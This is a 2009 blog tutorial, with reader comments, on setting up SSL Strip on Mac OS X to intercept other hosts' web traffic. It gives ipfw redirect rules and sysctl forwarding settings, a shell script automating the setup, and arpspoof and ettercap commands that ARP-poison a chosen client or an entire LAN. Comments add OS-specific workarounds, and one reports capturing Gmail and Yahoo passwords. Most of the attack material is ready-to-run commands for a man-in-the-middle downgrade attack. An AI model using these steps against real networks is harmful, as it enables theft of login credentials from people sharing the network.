Monday, May 4, 2009

SSL Strip on Mac OS X

After playing around with SSL Strip for a while on BackTrack 4, I decided to try getting it up and running on my MacBook. It turns out it was actually quite easy!

The first thing to do is download the SSL Strip package from Moxie Marlinspike's homepage. You can grab it from the link above.

Next, if you're using MacPorts Python 2.5, like I am, you'll need to:

sudo port install py25-socket-ssl

The MacPorts Python 2.5 port maintainer split the SSL socket module out into a separate package, so you'll need to add it as shown.

Now, you'll need to make sure your Mac is configured to do IP forwarding and that the IP firewall (ipfw) is enabled. Check the current values with the following commands:

sysctl net.inet.ip.forwarding
sysctl net.inet.ip.fw.enable


If either of those is disabled (reported as 0), set them like so:

sudo sysctl -w net.inet.ip.forwarding=1
sudo sysctl -w net.inet.ip.fw.enable=1


Now your system should be set for IP forwarding and applying firewall rules. Note that values set with sysctl -w do not survive a reboot, so you'll need to set them again after restarting.

The firewall rules can now be modified to redirect all port 80 traffic to the port SSL Strip will listen on. If you want to listen on 1234, for example, the following ipfw command (it needs root, hence the sudo) will set you up:

sudo ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80

The add fwd 127.0.0.1,1234 part tells ipfw to add a new rule that forwards matching packets to 127.0.0.1 on port 1234. The rest of the command is the logic used to match the traffic to be forwarded. tcp restricts the match to TCP. from not me to any matches traffic sent from any address other than one of your own interface addresses to any destination; if you instead use any to any I found that SSL Strip's own outbound connections get redirected back to itself, which will cause problems. Finally, the 80 specifies that only TCP traffic destined for the HTTP port will be forwarded. Like the sysctl settings, the rule is gone after a reboot; to remove it sooner, find its number with sudo ipfw list and run sudo ipfw delete with that number.

Finally, with that rule set up, all that needs to be done is to run SSL Strip. python sslstrip.py -h shows the following options:

sslstrip 0.2 by Moxie Marlinspike
Usage: sslstrip

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.


So, the basic python sslstrip.py -l 1234 should get you started. The port given to -l must be the same one the ipfw fwd rule points at, otherwise the redirected connections have nothing to land on and the client's HTTP traffic simply hangs.

The kill session and favicon options are handy, so those are worth checking out. Also, the -a option is handy if you need to debug things or just want a dump of all traffic which is running through the proxy.
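Here is the whole setup from above wrapped in a small shell script with a matching teardown. This is an added example, not code from the original post or from SSL Strip itself: it assumes Leopard-era ipfw (readers in the comments below report Snow Leopard also needing net.inet.ip.scopedroute=0, which is not included here) and sslstrip.py in the current directory, and the fixed rule number 1000, the variable names and the DRY_RUN switch are my own choices. DRY_RUN=1 prints the commands instead of running them, which is handy for checking the rule before touching a live firewall.

```shell
#!/bin/sh
# Added example (not from the original post): the sysctl/ipfw steps from the
# post as setup/start/teardown actions. Assumes Leopard-era ipfw and sslstrip
# 0.2; rule number 1000 and the variable names are my own choices.

LISTEN_PORT="${LISTEN_PORT:-1234}"          # must match sslstrip -l
RULE_NUM="${RULE_NUM:-1000}"                # explicit ipfw rule number, so deletion is exact
SSLSTRIP_PY="${SSLSTRIP_PY:-sslstrip.py}"   # path to sslstrip.py (assumed: current dir)
LOG_FILE="${LOG_FILE:-sslstrip.log}"
DRY_RUN="${DRY_RUN:-0}"                     # DRY_RUN=1 prints commands instead of running them

# run: execute a command, or print it when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = 1 ]; then
        echo "$*"
    else
        "$@"
    fi
}

# run_root: same, but through sudo (ipfw and sysctl -w need root).
run_root() {
    run sudo "$@"
}

# fwd_rule: the rule body from the post for a given listen port.
# "from not me" keeps sslstrip's own outbound port-80 connections from being
# looped back into the proxy.
fwd_rule() {
    echo "fwd 127.0.0.1,$1 tcp from not me to any 80"
}

# setup: turn on forwarding and the firewall, then add the numbered redirect.
setup() {
    run_root sysctl -w net.inet.ip.forwarding=1
    run_root sysctl -w net.inet.ip.fw.enable=1
    # shellcheck disable=SC2046  # word splitting is intended: ipfw wants separate args
    run_root ipfw add "$RULE_NUM" $(fwd_rule "$LISTEN_PORT")
}

# start: sslstrip listens on an unprivileged port, so no sudo is needed.
# -f swaps in the lock favicon, -k kills sessions in progress (both from -h above).
start() {
    run python "$SSLSTRIP_PY" -l "$LISTEN_PORT" -w "$LOG_FILE" -f -k
}

# teardown: remove the redirect first, then stop relaying other hosts' packets.
teardown() {
    run_root ipfw delete "$RULE_NUM"
    run_root sysctl -w net.inet.ip.forwarding=0
}

# status: show the two sysctls and the current rule table.
status() {
    run sysctl net.inet.ip.forwarding net.inet.ip.fw.enable
    run_root ipfw list
}

case "${1:-}" in
    setup)    setup ;;
    start)    start ;;
    status)   status ;;
    teardown) teardown ;;
    "")       ;;   # no argument: only define the functions (e.g. when sourced)
    *)        echo "usage: $0 setup|start|status|teardown" >&2; exit 2 ;;
esac
```

Run it as ./sslstrip-ipfw.sh setup, then start in another terminal, and teardown when you're done. The explicit rule number means the delete removes only this redirect and not whatever else is in your ipfw table, and turning forwarding back off means your Mac stops relaying other hosts' packets once the test is over.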

I think that's about it for all the configuring. Running and parsing the results of SSL Strip is something I'm sure you all can figure out.

Let me know if any of the above steps don't work for you. Otherwise, happy hacking, don't do anything mean and as usual, have fun!


Update 05/18/2009 -
After seeing Ivan's question, I realized I didn't provide anything on how to convince people to connect through you instead of the default gateway. Oops! Well, here's the rest:

I used arpspoof when setting up sslstrip for the first time because I'm more used to it, and I also find it easier to target individual clients. I also think it reduces my chances of breaking connectivity on the entire LAN if my ipfw config is off.

So, what I did in my initial testing was:

sudo arpspoof -i en1 -t 192.168.1.101 192.168.1.1

Where en1 is my Mac's AirPort adapter, 192.168.1.101 is the client I'm attempting to MITM, and 192.168.1.1 is the address I'm spoofing, which is the default gateway for my LAN. Note that this only poisons the client's ARP cache: the client sends its outbound packets to your Mac, which forwards them on to the real gateway, while for traffic you don't proxy the gateway's replies still go straight to the client. That is enough here, since SSL Strip only needs the client's outbound port 80 traffic to pass through your Mac.

I didn't use ettercap with sslstrip, but if I remember my ettercap correctly, you can use it to attack an entire LAN like so:

sudo ettercap -i en1 -Tq -M arp /192.168.1.1/ // -P autoadd

In this example, -Tq enables the console (text) interface in quiet mode, -M arp instructs ettercap to use ARP poisoning for the MITM, /192.168.1.1/ // instructs it to poison all connections between the gateway and any other host on the LAN, and -P autoadd enables the autoadd plugin so that hosts joining the LAN later are poisoned as well. -M arp:remote additionally makes ettercap itself dissect the connections that go through the gateway to hosts beyond the LAN; for this setup, where all you need is for the client's packets to pass through your Mac on the way to sslstrip, plain -M arp should be fine.

Hope this helps!

61 comments:

  1. Hi thanks, it was very useful. Just one question:
    Did you use arpspoof or ettercap??

  2. Hey, Ivan. I'm glad you found it useful!

    I'm surprised I forgot to explain how I went about setting up the MITM! I updated my post above so check it out for the juicy ARP details.

    Cheers!

  3. Thanks for the great article, really helped :)

  4. Again thanks, I read an article where they used ettercap but I like your reason about using arpspoof :D

  5. Great write up.

    Is it ok to leave the "ipfw add fwd" and ip forwarding on after you are done, or should you remove to cleanup.

  6. Re: "Is it ok to leave the "ipfw add fwd" and ip forwarding on after you are done, or should you remove to cleanup."

    That's an excellent question! You can actually leave it as-is and you should be fine. The 'from not me to any' part of the rule ensures that the only traffic which is forwarded are packets where the source IP is something other than your own.

    Unless you use the OS X machine as a router or you are using some kind of arp, dhcp, dns spoofing etc. your firewall should not be seeing any traffic other than your own.

    The only thing I can think of is that there may be a tiny bit of a performance impact from having additional unused firewall rules. However, unless your machine has an amazingly high amount of IP traffic, I doubt that you'll even notice any impact even if there is one.

  7. Thanks for this tutorial.
    It helped me a lot!

  8. Nice, I will try this later on 10.6.2

  9. Thanks for the article man, it was nice and helpful, but I have 2 questions:
    1- when I use ssl strip with python 2.6 it gives me:
    DeprecationWarning: the md5 module is deprecated; use hashlib instead ?
    2- ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80 the target stops browsing until I remove the rule. I'm using snow, arpspoof.

  10. I haven't been able to get ip forwarding to work on snowleopard. Ryan, have you figured this out?

  11. sudo sysctl -w net.inet.ip.forwarding=1 this is how I worked it out

  12. Amazing, on Snow Leopard ipfw forward doesn't work... and it seems that I'm not the only person who has this issue; this http://tinyurl.com/y9gcacw is another...

  13. After doing some digging around the interwebs, it does seem like several people are having problems getting forwarding to work with ipfw on Snow Leopard. Unfortunately, I don't have a copy on my MacBook (I know, I've been lazy). I will try to do some digging and also get a copy of Snow Leopard soon. It is strange that this seems to be broken on Snow Leopard...

  14. This is another confirmation that many people have problem with ipfw fwd on Snow Leopard http://tinyurl.com/yj9eu2h

  15. This is actually not a stupid post... Strange that it was done by a mac user.

    If only all mac users were as smart as you, it would be less annoying that they are all so stuck up.

    Also: for all your forwarding troubles you could make your own program pretty easily using pcap and c++
    OR
    use the fragrouter port: fragrouter -B1

    Make sure you disable kernel ip forwarding. Or you could use ettercap, it has built in forwarding (and also a packet filter which rules)

  16. Hehe, I'm glad that I was able to surprise you with my non-stuck up Mac knowledge. I'm definitely not a typical Mac user... the reason I use one is that it's actually a great hacker's platform. Don't get me wrong, Linux rocks, and will always be my #1 OS, but Mac hardware together with OS X makes an amazing computer for day to day use. I normally have a BackTrack laptop I use for serious business, but sometimes I just like to be able to hack around on my Mac, and I think the fact that it can do these types of things is pretty awesome.

  17. Hey Ryan, I did everything as you described here and everything seemed to go as it should, but once I start arpspoof and run sslstrip, if I try to browse the internet in the target machine it becomes unresponsive. Could you help me out? Thanks.

  18. Hey there, how did you manage to install the twisted module?

  19. For twisted: sudo easy_install twisted, also used easy_install for the ssl libraries.

    I have no luck with the transparent proxy on 10.6 either. Anyone got that working?

  20. Hey everyone, I finally got around to playing with the latest version of SSL Strip.

    @Brus, you can either install twisted using easy_install or with MacPorts. The port name is py26-twisted-web2 (or py25 if you're using python 2.5, for example).

    As far as the ipfw troubles, I tried finding a solution all weekend long and couldn't come up with anything. I tried using both forwarding and divert without any success. Everything I read seems to indicate that ipfw forwarding is just plain broken on Snow Leopard. Apple doesn't seem to care about ipfw at all anymore.

    I will try to keep digging into this the next couple days. If anyone else has figured something out with ipfw, please let me know. Otherwise, we'll have to go outside of what is supplied by the OS and use ettercap or fragrouter as was previously suggested.

  21. @Ryan - I have no luck with ettercap either as the MITM attacks it uses require the same IPFW config sslstrip needs. I also tried to play around with filters hoping to get things going but did not manage. The last part might simply be me. That was my first attempt writing a filter :-P

  22. OK - I looked at this a bit more. Testing my ipfw rules with a netcat listener, I figured out that it's not how IPFW behaves that causes the issue on Mac OS 10.6. It's how the socket behaves instead! If you have a packet coming in with the destination of the IP of the interface, it's fine. The FWD rule works!

    Ex:

    - ipfw add fwd 127.0.0.1,1234 tcp from any to any 80
    - nc -l -p 1234

    trying to connect to the IP of that machine on port 80 will let us establish a socket, but sending a forged SYN will never yield a reply... even if I manage to send the packet directly on 1234 to bypass IPFW. Looks like the INADDR_ANY sockets are broken :-(

    Some other people are having this issue: http://lists.apple.com/archives/Darwin-dev/2009/Nov/msg00002.html

    Now if we could figure a work around or what Apple is doing about it that would be nice!

    -- Sorry for spamming your blogs / comments

  23. Any news on this IPFW issue?

    It is impossible for me to install fragrouter and arpspoof(dsniff) or ettercap. One port depends on libnet and the other on libnet11. Both cannot be installed...

  24. @stix

    I've not made any progress on the IPFW issues. I tried using both fragrouter and ettercap, but neither seem to be able to do what I want. I tried writing an ettercap filter, but could not make it work. Perhaps a full-blown ettercap plugin could do it.

    As far as your build problems go, I'd try the dsniff-devel package instead. That one should use libnet11 rather than libnet. Also, I'd install ettercap-ng instead of the regular old ettercap.

  25. @Ryan I saw your articles and replies.... Is any solution for IPFW?

  26. Unfortunately, there doesn't seem to be any solution yet. If you need to use this on a mac, the easiest way is probably just to run backtrack in a VM or set up a dual boot...

  27. @Ryan Thank you for your kind reply. I hope this problem will be fixed soon. Because I love my Macbook ^^;

    Have a nice day~!

  28. Solution is:

    sudo sysctl -w net.inet.ip.scopedroute=0

    Ciaooo,
    Simone

  29. Hi Ryan, cracking original post, any comment on Simones suggestion of sudo sysctl -w net.inet.ip.scopedroute=0?

    Would really like to get this working and hitting brick walls all over the place!

    Nick

  30. One question: I tried it with my two computers and it worked like a charm, but after a few minutes the internet connection is not possible anymore (on both computers). After killing the arpspoof everything works again.
    Any suggestions?
    thanks

    ps for everyone who has issues regarding the libnet / libnet11 dep. just use two different ports (fink and macport for example)

  31. I'm using a Pineapple from Hak5 with Karma, wired to my MacBook with the ether port IP set as the default gateway. I then set Internet Sharing from my internet connection (wifi) to the ether port. Target connects to the Pineapple, routes through the Mac and out on to the web, cracking! I can then Wireshark the ether port and capture traffic. Trouble is, I want SSLStrip in the middle and am having a darned job getting it to work. Any ideas would be great.

    Nick

  32. @Volker I'm not sure what might be happening with the connection. I have no idea why killing arpspoof would resolve the problem either. I'd check your Console Logs to see if there is anything suspicious in there...

    @Nick It sounds like a pretty nice setup you have there! I would actually start by disabling Internet Sharing. If you run

    sudo sysctl -w net.inet.ip.forwarding=1
    sudo sysctl -w net.inet.ip.fw.enable=1

    that should both enable the firewall and enable forwarding. This will effectively replace the Internet Sharing option. You will probably want to try Simone's tip of running:

    sudo sysctl -w net.inet.ip.scopedroute=0

    I have not yet tried that last one, by the way, so I don't know if it fixes the routing problem entirely.

    Once you have those all set, all that is left is to set up the redirect for SSLStrip. Run the ipfw commands in the post above and that should set up the SSLStrip forward. Unless I'm missing something, I believe that will be all you need to get up and running.

    Let me know how it goes!

  33. Thanks for the response. Interesting. OK, as briefly as possible. I've got twisted and ssl installed, SSLStrip installed fine. All sysctl and ipfw commands ran cleanly. SSLStrip runs without error.

    Sadly, without Internet Sharing (IS) running, no bananas!

    Now, with IS running, all is fine but once the ipfw command was run, my target has remained connected, I can still ping, skype is still up but all port 80 traffic falls into a black hole. No browsing.

    Running SSLStrip makes no difference, Firefox on the target reports that the connection as timed out.

    I would suggest that the forwarding is doing what it should but something bad is happening with IS on.

    Sat here with puzzled expression and an open box of jelly babies. Without some fairly swift assistance there is the danger I will polish off the box!

    Nick

  34. ps. if I remove the ipfw rule all is good again

  35. Sorry mate dominating your forum here :(

    Very interesting, OSX Internet Sharing is just a GUI for IPFW - who knew!! When I turn on IS, it just adds:-

    00010 773000 609196156 divert 8668 ip from any to any via en2

    This strikes me as a good thing - maybe? Essentially if we can manipulate the IPFW rules to still allow the sharing on en2 but pop by port 1234 on the way.

    I'd never looked at an IPFW command before yesterday so uphill slope is the order of the morning. Jelly babies going down!

    Nick

  36. Hi Ryan,

    as far as I know now it has something to do with the key renewal. So every few minutes WPA2 does the key renewal and that's why the arpspoof doesn't work anymore.
    So the big question is how to deal with that. Any ideas?
    btw does someone has similar issues?

    Volker

  37. I think I found a fix for snow leopard. This works for me. YMMV.

    $ sudo ipfw add fwd 127.0.0.1,1234 tcp from any to any dst-port 80 recv en1

  38. Ryan thanks for your post!
    to resolve the "forwarding" problem under Snow Leopard:

    sysctl -w net.inet.ip.scopedroute=0
    (default is 1)

    then the packet forwarding works great for me.

  39. Hi friends,

    i've tried almost all the combinations possible with ipfw rules
    (each one at a time)

    ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80

    ipfw add fwd 127.0.0.1,1234 tcp from any to any dst-port 80 recv en1

    and the sysctl options

    sysctl -w net.inet.ip.forwarding=1
    sysctl -w net.inet.ip.fw.enable=1

    sysctl -w net.inet.ip.scopedroute=0

    but no success, when I fire up sslstrip and the ipfw rule, the victim
    loses access to http at all.

    What am I doing wrong?
    Is there a recipe for getting this working correctly?

    Thanx

  40. Maybe this is a long shot, since this is so old. But I'm having an issue with the port forwarding part. I have it working on my linux computer which is annoying cause I want it to work on my macbook as well.
    I'm using ettercap with MitM and am trying to change HTTPS to HTTP, which I am able to do on the linux with IPTABLES, but when I use IPFW I can't get the same effect, the browser of the attacked computer just stops and won't load the page. Do you know anything about the differences between IPFW and IPTABLES and could help me?

  41. OH MY GOD. Two posts up answered my question. wow.


    sysctl -w net.inet.ip.scopedroute=0

    Geez :facepalm:

  42. python sslstrip.py -h
    /opt/local/Library/Frameworks/Python.framework/Versions/2.5/Resources/Python.app/Contents/MacOS/Python: can't open file 'sslstrip.py': [Errno 2] No such file or directory

    I know this is old but I can't think of what to do. I run this on BT4 all the time but I'm at a loss

  43. Just found this page since I had the same problems running sslstrip on snow leopard and I solved it by adding sslstrip and arpspoof to the Firewall Layer Application authorization list. Maybe this can help some of you.

    However I now face another problem. I'm now able to sniff passwords but the whole process prevents the login of the user. I've tested it on yahoo and gmail. I get the password of my test accounts but the browser switches back to the gmail or yahoo login page. I don't know if it's snow leopard specific or not.

  44. I am literally banging my head on the desk with this one, I can do trouble shooting, but this is ridiculous. Does anyone have any insight into the fact that no matter what you do, victims get cut off from HTTP access?

  45. Any news ? I spent a lot of time on this problem and did not get any result

  46. It seems I'm getting better result when specifying only one target eg // /192.168.0.10/ . Don't know why.

  47. Hi, I'm using this but with Ettercap-ng because I want to see the LOGINS right away instead, and I just feel it is much simpler and feels more right.

    Here are the commands I use in MAC OS X "latest"

    sudo sysctl -w net.inet.ip.forwarding=1
    sudo sysctl -w net.inet.ip.fw.verbose=1
    sudo sysctl -w net.inet.ip.scopedroute=0

    sudo sslstrip -l 8080
    sudo ipfw add fwd 127.0.0.1,8080 log tcp from not me to any 80

    sudo ettercap -C <-- Terminal UI Based, Scan for Hosts, Host File: Add target 1 and 2 gateway.. MITM: remote -> Then start sniffing.

    You have forgot to tell people to:
    sudo sysctl -w net.inet.ip.scopedroute=0 <-- that's really important.

    Thanks for the great tutorial btw.

  48. Things changed in Lion.

    Using Xcode v4.1
    all works great, except the command:

    sysctl -w net.inet.ip.scopedroute=0

    that now returns:

    sysctl: oid 'net.inet.ip.scopedroute' is read only

    Is there any solution or someone who made sslstrip works in Lion?

  49. You can set scopedroute to 0 on boot somehow. Forgot how exactly, but you just add the above to a file... (not very helpful, i'm sorry!)

    I still couldn't get SSLStrip to work on Lion though. Not sure why. I think it might have something to do with ettercap's sniffer. I'll try running it with the -o flag and see if that lets packets reach SSL strip.

  50. I have done some research on this as well. It appears that you are unable to set the scopedroute to 0 in OS X Lion. I have attempted to edit a certain file that will set scopedroute to 0 as the kernel boots up however I have been unsuccessful in my efforts. If anyone can get anywhere with this please respond I'd love to get this working!

  51. The fix is here

    https://github.com/thatha/sshuttle/blob/macos_10_7_only_hack/README.md

    Replies
    1. Hi, how is that supposed to be the fix? Can you provide us with more information here? Thanks

  52. Has anyone found the solution for the SSL with Lion? I didn't find the previous link that helpful; any help would be highly appreciated.

  53. Run as root


    rm /Library/Preferences/SystemConfiguration/com.apple.Boot.plist.lockfile

    echo 'Kernel Flagsnet.inet.ip.scopedroute=0' > /Library/Preferences/SystemConfiguration/com.apple.Boot.plist

    Then reboot and check:

    sysctl -a | grep bootargs

    sysctl -a | grep net.inet.ip.scopedroute


    Source: https://groups.google.com/forum/?fromgroups#!topic/sshuttle/pCUFyjPh3oA

    Replies
    1. Formatting error

      disregard the post and scroll to the bottom of the source for the correct commands

  54. I am having a slight problem. I got up to

    ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80
    Except replaced with my information I get

    ipfw: socket: Operation not permitted

  55. 10.9 Mavericks with the same problem:
    "ipfw add fwd 127.0.0.1,1234 tcp from not me to any 80
    Except replaced with my information I get

    ipfw: socket: Operation not permitted"

    Replies
    1. easy. Just type sudo before the command

    2. as a start, if anything says permission denied, put a sudo in front

    3. Hello, nice article. Everything went well with me until I input the command "ipfw add fwd 127.0.0.1,8080 tcp from not me to any 80"; it returns the error ipfw command not found. Please, how do I go from here?
